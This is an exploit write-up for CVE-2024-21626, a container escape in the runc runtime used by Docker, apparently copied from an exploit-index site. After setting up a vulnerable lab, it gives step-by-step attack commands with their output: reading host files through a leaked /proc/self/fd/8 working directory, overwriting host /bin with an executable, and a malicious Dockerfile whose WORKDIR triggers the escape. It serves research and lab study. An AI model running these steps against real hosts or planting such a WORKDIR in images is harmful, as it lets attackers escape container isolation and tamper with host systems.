## https://sploitus.com/exploit?id=17F0090F-89AC-5757-A39B-45005DECDB39
# PoC of CVE-2024-21626
Read my full article for detailed explanation [here](https://sk3pper.github.io/posts/cve-2024-21626/playing-with-cve-2024-21626/).
## Setup environment ๐จ
#### A. Download and install 22.04.1-Ubuntu LTS version
During the installation do not check the box to download update system.
#### B. Install guest additions CD image to easily work with the virtual machine
- insert Guest additions CD image
- open terminal in the mounted CD image
- run the VBoxLinuxAdditions.run script
```shell
demo@demo-pc:/media/demo/VBox_GAs_7.0.14$ sudo ./VBoxLinuxAdditions.run
```
#### C. Install the vulnerable docker version and related components
- Set up Docker's apt repository
```shell
# set up Docker's apt repository: add Docker's official GPG key:
sudo apt update
sudo apt install ca-certificates curl
sudo install -m 0755 -d /etc/apt/keyrings
sudo curl -fsSL https://download.docker.com/linux/ubuntu/gpg -o /etc/apt/keyrings/docker.asc
sudo chmod a+r /etc/apt/keyrings/docker.asc
# add the repository to Apt sources:
echo \
"deb [arch=$(dpkg --print-architecture) signed-by=/etc/apt/keyrings/docker.asc] https://download.docker.com/linux/ubuntu \
$(. /etc/os-release && echo "$VERSION_CODENAME") stable" | \
sudo tee /etc/apt/sources.list.d/docker.list > /dev/null
sudo apt update
```
- Find and install the right version of the different components (docker-ce, docker-ce-cli, containerd.io, docker-buildx-plugin).
```shell
# search in the cache reposiroty the docker-ce available packages
apt-cache madison docker-ce | awk '{ print $3 }'
# setup the chosen version
VERSION_STRING=5:24.0.6-1~ubuntu.22.04~jammy
# search in the cache reposiroty the containerd.io and docker-buildx-plugin available packages
apt-cache madison containerd.io | awk '{ print $3 }'
apt-cache madison docker-buildx-plugin | awk '{ print $3 }'docker-buildx-plugin
# install the packages
sudo apt install docker-ce=$VERSION_STRING \
docker-ce-cli=$VERSION_STRING \
containerd.io=1.6.4-1 \
docker-buildx-plugin=0.10.2-1~ubuntu.22.04~jammy
```
If the packages are too old to find (see also the old repository online), or if you can't use Docker's apt repository to install Docker Engine, you can download the deb file for your release and install it manually.
Go to https://download.docker.com/linux/ubuntu/dists/ or use the deb files inside the my GitHub repository and install them.
```shell
# clone CVE-2024-21626 repository
git clone git@github.com:Sk3pper/CVE-2024-21626.git
# install deb files
cd CVE-2024-21626/deb
sudo dpkg -i ./containerd.io_1.6.4-1_amd64.deb \
./docker-ce_24.0.6-1~ubuntu.22.04~jammy_amd64.deb \
./docker-ce-cli_24.0.6-1~ubuntu.22.04~jammy_amd64.deb \
./docker-buildx-plugin_0.10.2-1~ubuntu.22.04~jammy_amd64.deb
```
#### D. Check the installed versions
```shell
sudo docker version
runc --version
containerd --version
uname -r
```
#### E. Check if the kernel is vulnerable
To work properly the vulnerability needs the presence of openat2 syscall. Manually checking with the following command:
```shell
grep openat2 /proc/kallsyms
```
There could be cases where it is necessary to check with the following golang script available in my GitHub repository if the openat2 syscall is present.
```shell
# clone CVE-2024-21626 repository
git clone git@github.com:Sk3pper/CVE-2024-21626.git
# run testOpenat2
cd testOpenat2
./testOpenat2
The unix.Openat2 syscall is present on this system.
```
The binary found was build with the following flags
```shell
env GOOS=linux GOARCH=amd64 go build testOpenat2.go
```
## Verify if the target is vulnerable ๐ง
Run checkVulnerability.sh and see if the file is printed in the the terminal
```shell
# clone CVE-2024-21626 repository
git clone git@github.com:Sk3pper/CVE-2024-21626.git
# run checkVulnerability.sh
chmod +x checkVulnerability.sh
./checkVulnerability.sh
```
## Attack 1 ๐ฆ
Exploit via Setting Working Directory to `/proc/self/fd/`
```shell
# run container with working directory to /proc/self/fd/8
sudo docker run -w /proc/self/fd/8 --name cve-2024-21626 --rm -it debian:bookworm
# read host filesystem files inside the container
root@c4c0a9c99be6:.# cat ../../../../../../../../../../../etc/hostname
job-working-directory: error retrieving current directory: getcwd: cannot access parent directories: No such file or directory
demo-pc
```
![exploit via running a container](./images/attack1.png)
## Attack 2 ๐ฏ
Exploit via docker exec:
Open one terminal and execute the following commands
```shell
# terminal 1
# run container
demo@demo-pc:~$ sudo docker run --name cve-2024-21626 --rm -it debian:bookworm
# create symlinks
root@d98de5a852d7:/# ln -sf /proc/self/fd/8/ /foo
root@d98de5a852d7:/# ln -sf /proc/self/fd/8/ /bar
```
Open another terminal and run the following command
```shell
# terminal 2: exec inside the container and set working directory
sudo docker exec -it -w /bar cve-2024-21626 sleep 120
```
Come back to the first terminal and access to the host path filesystem
```shell
# terminal 1: find actula pid with the right cmdline
root@d98de5a852d7:/# ls -f /proc
. irq kmsg kcore mdstat cpuinfo sysvipc softirqs bootconfig execdomains sysrq-trigger 15
.. net misc locks mounts devices version zoneinfo interrupts filesystems version_signature
fb sys mtrr swaps uptime ioports consoles buddyinfo kpagecount kpagecgroup self
fs tty scsi asound vmstat loadavg kallsyms diskstats kpageflags vmallocinfo thread-self
bus acpi stat crypto cgroups meminfo pressure key-users partitions pagetypeinfo 1
dma keys iomem driver cmdline modules slabinfo schedstat timer_list dynamic_debug 9
root@d98de5a852d7:/# cat /proc/9/cmdline
sleep120
# read host filesystem files
root@d98de5a852d7:/# cat /proc/9/cwd/../../../../../../../../../etc/hostname
demo-pc
# read container filesystem files
root@d98de5a852d7:/# cat /etc/hostname
d98de5a852d7
```
![Exploit via execing into a running container](./images/attack2.png)
## Attack 3a ๐ฆ
```shell
# Attack 3a is attack 1 but adapted to overwrite a host binary
# run container with the working direcotry to /proc/self/fd/8
sudo docker run -w /proc/self/fd/8 --name cve-2024-21626 --rm -it debian:bookworm
shell-init: error retrieving current directory: getcwd: cannot access parent directories: No such file or directory
root@e5b0730af51d:.#
# write file in the host container
root@b6873018a7e8:.# cat > ../../../../../../../../bin/cve2024_21626 << EOF
#!/bin/bash
echo "Hello CVE-2024-21626"
EOF
# change chmod
root@b6873018a7e8:.# ../../../../../bin/chmod +x ../../../../bin/cve2024_21626
job-working-directory: error retrieving current directory: getcwd: cannot access parent directories: No such file or directory
# check if the file is present in the host
demo@demo-pc:/bin$ ls -la | grep cve
-rwxr-xr-x 1 root root 40 mar 7 13:24 cve2024_21626
# try it in the host
demo@demo-pc:/bin$ sudo ./cve2024_21626
Hello CVE-2024-21626
```
![Exploit via execing into a running container](./images/attack3a.png)
## Attack 3b ๐ฆ
```shell
# scenario 3b: host binary overwrite attack
# Attack 3b is attack 2 but adapted to overwrite a host binary
# terminal 1
# run container
sudo docker run --name cve-2024-21626 --rm -it debian:bookworm
# create symlinks
root@d98de5a852d7:/# ln -sf /proc/self/fd/8/ /foo
root@d98de5a852d7:/# ln -sf /proc/self/fd/8/ /bar
# terminal 2: exec inside the container and set working directory
sudo docker exec -it -w /bar cve-2024-21626 sleep 1000
# terminal 1
# find actula pid with the right cmdline
root@d98de5a852d7:/# ls -f /proc
. irq kmsg kcore mdstat cpuinfo sysvipc softirqs bootconfig execdomains sysrq-trigger 15
.. net misc locks mounts devices version zoneinfo interrupts filesystems version_signature
fb sys mtrr swaps uptime ioports consoles buddyinfo kpagecount kpagecgroup self
fs tty scsi asound vmstat loadavg kallsyms diskstats kpageflags vmallocinfo thread-self
bus acpi stat crypto cgroups meminfo pressure key-users partitions pagetypeinfo 1
dma keys iomem driver cmdline modules slabinfo schedstat timer_list dynamic_debug 9
root@d98de5a852d7:/# cat /proc/9/cmdline
sleep120
# write file in the host container
root@b6873018a7e8:.# cat > /proc/8/cwd/../../../../bin/cve2024_21626 << EOF
#!/bin/bash
echo "Hello CVE-2024-21626"
EOF
# change chmod
root@b6873018a7e8:.# /proc/8/cwd/../../../../bin/chmod +x \
/proc/8/cwd/../../../../bin/cve2024_21626
job-working-directory: error retrieving current directory: getcwd: cannot access parent directories: No such file or directory
# check if the file is present in the host
demo@demo-pc:/bin$ ls -la | grep cve
-rwxr-xr-x 1 root root 40 mar 7 13:39 cve2024_21626
# try it in the host
demo@demo-pc:/bin$ sudo ./cve2024_21626
Hello CVE-2024-21626
```
## Attack with malicious image :whale:
Given the followinf Dockerfile
```Dockerfile
FROM ubuntu:20.04
RUN apt-get update -y && apt-get install netcat -y
WORKDIR /proc/self/fd/8
```
Build and run the image
```shell
sudo docker build . -t devil-image
sudo docker run -it --rm devil-image bash
shell-init: error retrieving current directory: getcwd: cannot access parent directories: No such file or directory
root@415a2e1f079f:.# cat ../../../../../etc/hostname
job-working-directory: error retrieving current directory: getcwd: cannot access parent directories: No such file or directory
demo-pc
```
![Exploit via malicious image](./images/attack4.png)